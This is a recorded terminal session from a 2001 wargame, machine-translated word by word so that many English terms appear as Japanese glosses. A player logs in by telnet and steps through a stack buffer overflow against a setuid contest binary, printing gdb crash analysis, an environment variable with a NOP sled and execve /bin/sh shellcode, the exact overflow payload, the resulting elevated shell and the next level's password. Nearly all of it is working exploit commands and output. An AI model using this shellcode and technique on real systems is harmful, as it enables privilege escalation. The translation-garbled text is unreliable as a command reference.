|
このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
Script started on Tue Dec 25 01:25:19 2001 恐れる:0:level7$ telnet 切り開く/タクシー/不正アクセス.datafort.逮捕する Trying 213.132.58.103... Connected to 切り開く/タクシー/不正アクセス.datafort.逮捕する. Escape character is '^]'. FreeBSD/i386 (badc0ded.datafort.逮捕する) (ttyp1) login: level7 Password: Last login: Tue Dec 25 10:23:55 from 12.245.109.153 Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All 権利s reserved. FreeBSD 4.4-RELEASE (GENERIC) #0: Tue Sep 18 11:57:08 PDT 2001 bash-2.05$ cd temp bash-2.05$ cp /contest/level8 . bash-2.05$ mv level8 l8 bash-2.05$ ./l8 `perl -e 'print "A" x 4096'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 1024'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 512'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 128'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 64'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 32'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 16'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x41414141 in ?? () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 8'` 違法な 指示/教授/教育 (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 4, 違法な 指示/教授/教育. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x8048403 in atexit () (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 8 . "B" x 4'` Segmentation fault (核心 捨てるd) bash-2.05$ gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)... done. #0 0x42424242 in ?? () (gdb) やめる bash-2.05$ 輸出(する) EGG=`perl -e 'print "\x90" x 128 . "\x31\xc0\x50\x68//sh\x68/貯蔵所\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"'` bash-2.05$ gcc -o gs /tmp/getshit.c bash-2.05$ ./gs bfbffce3 bash-2.05$ ./l8 `perl -e 'print "A" x 8 . "\xf0\xfc\xbf\xbf"'` 違法な 指示/教授/教育 (核心 捨てるd) bash-2.05$ !gdb gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 4, 違法な 指示/教授/教育. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done. #0 0xbfbffcf0 in ?? () (gdb) x/24wx 0xbfbffce3 0xbfbffce3: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffcf3: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd03: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd13: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd23: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd33: 0xffffffff 0xffffffff 0xffffffff 0xffffffff (gdb) 0xbfbffd43: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd53: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd63: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd73: 0xffffffff 0xffffffff 0xffffffff 0xffff00ff 0xbfbffd83: 0xffffffff 0xffffffff 0xffffffff 0xffffffff 0xbfbffd93: 0x00ffffff 0xffffffff 0xffffffff 0xffffffff bash-2.05$ ./l8 `perl -e 'print "A" x 8 . "A" x 4'` Segmentation fault (核心 捨てるd) bash-2.05$ !gdb gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done. #0 0x41414141 in ?? () (gdb) i r eax 0xbfbffacc -1077937460 ecx 0xbfbffad4 -1077937452 edx 0xbfbffc15 -1077937131 ebx 0x2 2 esp 0xbfbffad8 0xbfbffad8 ebp 0x41414141 0x41414141 esi 0xbfbffb24 -1077937372 edi 0xbfbffb30 -1077937360 eip 0x41414141 0x41414141 eflags 0x10286 66182 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) x/24wx 0xbfbffacc 0xbfbffacc: 0x41414141 0x41414141 0x41414141 0x00000000 0xbfbffadc: 0xbfbffb24 0xbfbffb30 0x00000283 0xbfbffb1c 0xbfbffaec: 0x080483c2 0x08048493 0x080485cc 0x00000000 0xbfbffafc: 0x00000000 0x00000000 0xbfbffb18 0x00000000 0xbfbffb0c: 0x00000000 0xbfbffb18 0xbfbffb1c 0x2804cd78 0xbfbffb1c: 0x00000000 0x00000002 0xbfbffc08 0xbfbffc0d (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 8 . "\xd0\xfa\xbf\xbf"'`$EGG Bus error (核心 捨てるd) bash-2.05$ !gdb gdb -q ./l8 l8.核心 (no debugging symbols 設立する)...核心 was 生成するd by `l8'. Program 終結させるd with signal 10, Bus error. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols 設立する)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols 設立する)...done. #0 0xbfbffad0 in ?? () (gdb) i r eax 0xbfbffa30 -1077937616 ecx 0xbfbffad8 -1077937448 edx 0xbfbffc19 -1077937127 ebx 0x2 2 esp 0xbfbffa3c 0xbfbffa3c ebp 0x41414141 0x41414141 esi 0xbfbffa88 -1077937528 edi 0xbfbffa94 -1077937516 eip 0xbfbffad0 0xbfbffad0 eflags 0x10282 66178 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) x/24wx 0xbfbffa30 0xbfbffa30: 0x41414141 0x41414141 0xbfbffad0 0x90909090 0xbfbffa40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfbffa50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfbffa60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfbffa70: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfbffa80: 0x90909090 0x90909090 0x90909090 0x90909090 (gdb) やめる bash-2.05$ ./l8 `perl -e 'print "A" x 8 . "\x50\xfa\xbf\xbf"'`$EGG $ 出口 bash-2.05$ /contest/l8 `perl -e 'print "A" x 8 . "\x50\xfa\xbf\xbf"'`$EGG $ id uid=1007(level7) euid=1009(level8) gid=1007(level7) groups=1007(level7) $ pass The password for level8 is w1nblo3 $ 出口 bash-2.05$ cd .. bash-2.05$ rm -rf wtf bash-2.05$ 出口 関係 の近くにd by foreign host. 恐れる:0:level7$ 出口 Script done on Tue Dec 25 01:37:07 2001